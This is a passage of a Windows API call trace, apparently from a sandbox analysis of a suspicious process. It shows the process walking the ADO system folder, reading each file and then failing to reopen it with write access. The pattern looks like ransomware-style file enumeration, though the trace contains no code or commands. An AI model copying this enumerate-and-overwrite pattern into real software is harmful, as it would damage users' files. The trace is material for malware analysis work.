(HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0088.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0088.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0088.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0088.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0088.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0088.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0088.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0088.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0088.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0088.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0088.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0088.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0088.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0088.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ad80 [0088.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0088.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0088.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0088.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0088.012] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.012] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.012] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.012] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0088.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.012] AreFileApisANSI () returned 1 [0088.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc", lpUsedDefaultChar=0x0) returned 52 [0088.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0088.012] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.012] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0088.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0088.012] AreFileApisANSI () returned 1 [0088.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0088.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x460b8 [0088.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x460b8, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 52 [0088.012] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.013] GetFileType (hFile=0x348) returned 0x1 [0088.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0088.013] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.013] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.014] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.014] CloseHandle (hObject=0x348) returned 1 [0088.014] AreFileApisANSI () returned 1 [0088.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0088.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x460b8 [0088.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x460b8, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 52 [0088.014] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.014] GetLastError () returned 0x5 [0088.014] GetLastError () returned 0x5 [0088.014] SetLastError (dwErrCode=0x5) [0088.014] GetLastError () returned 0x5 [0088.014] SetLastError (dwErrCode=0x5) [0088.014] GetLastError () returned 0x5 [0088.014] SetLastError (dwErrCode=0x5) [0088.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0088.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0088.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0088.015] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.015] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.015] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0cb2730, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="en-US", cAlternateFileName="")) returned 1 [0088.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0088.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0088.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0088.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0088.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0088.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0088.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0088.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0088.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0088.015] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.015] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.015] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.015] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0088.015] AreFileApisANSI () returned 1 [0088.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\en-US", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\en-US", lpUsedDefaultChar=0x0) returned 47 [0088.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0088.015] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.015] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0088.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0088.016] AreFileApisANSI () returned 1 [0088.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0088.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x715b8 [0088.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\en-US") returned 47 [0088.016] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US" (normalized: "c:\\program files\\common files\\system\\ado\\en-us"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.016] GetLastError () returned 0x5 [0088.016] GetLastError () returned 0x5 [0088.016] SetLastError (dwErrCode=0x5) [0088.016] GetLastError () returned 0x5 [0088.016] SetLastError (dwErrCode=0x5) [0088.016] GetLastError () returned 0x5 [0088.016] SetLastError (dwErrCode=0x5) [0088.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0088.016] AreFileApisANSI () returned 1 [0088.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0088.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71620 [0088.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\en-US") returned 47 [0088.016] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US" (normalized: "c:\\program files\\common files\\system\\ado\\en-us"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.017] GetLastError () returned 0x5 [0088.017] GetLastError () returned 0x5 [0088.017] SetLastError (dwErrCode=0x5) [0088.017] GetLastError () returned 0x5 [0088.017] SetLastError (dwErrCode=0x5) [0088.017] GetLastError () returned 0x5 [0088.017] SetLastError (dwErrCode=0x5) [0088.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0088.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0088.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0088.017] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.017] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.017] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.017] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0088.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0088.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0088.017] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43854cb5, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x43854cb5, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x43854cb5, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msader15.dll", cAlternateFileName="")) returned 1 [0088.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0088.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0088.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0088.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0088.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a368 [0088.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0088.018] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78690 [0088.018] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0cb2730, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.018] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b9483e2, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb3fb1900, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x4600, dwReserved0=0x0, dwReserved1=0x0, cFileName="msader15.dll.mui", cAlternateFileName="")) returned 1 [0088.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0088.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0088.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0088.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0088.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0088.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0088.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0088.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0088.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0088.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0088.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0088.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x460b8 [0088.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0088.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0088.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0088.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0088.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0088.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0088.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0088.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0088.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0088.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0088.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0088.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0088.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ace8 [0088.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0088.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0088.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0088.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0088.019] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.019] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.019] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.019] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0088.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0088.019] AreFileApisANSI () returned 1 [0088.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui", lpUsedDefaultChar=0x0) returned 64 [0088.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0088.019] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.019] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0088.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0088.019] AreFileApisANSI () returned 1 [0088.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0088.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0088.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6de98, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 64 [0088.019] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0088.020] GetFileType (hFile=0x35c) returned 0x1 [0088.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0088.020] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.020] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.021] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.021] CloseHandle (hObject=0x35c) returned 1 [0088.021] AreFileApisANSI () returned 1 [0088.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0088.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0088.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6ec68, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 64 [0088.021] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.021] GetLastError () returned 0x5 [0088.021] GetLastError () returned 0x5 [0088.021] SetLastError 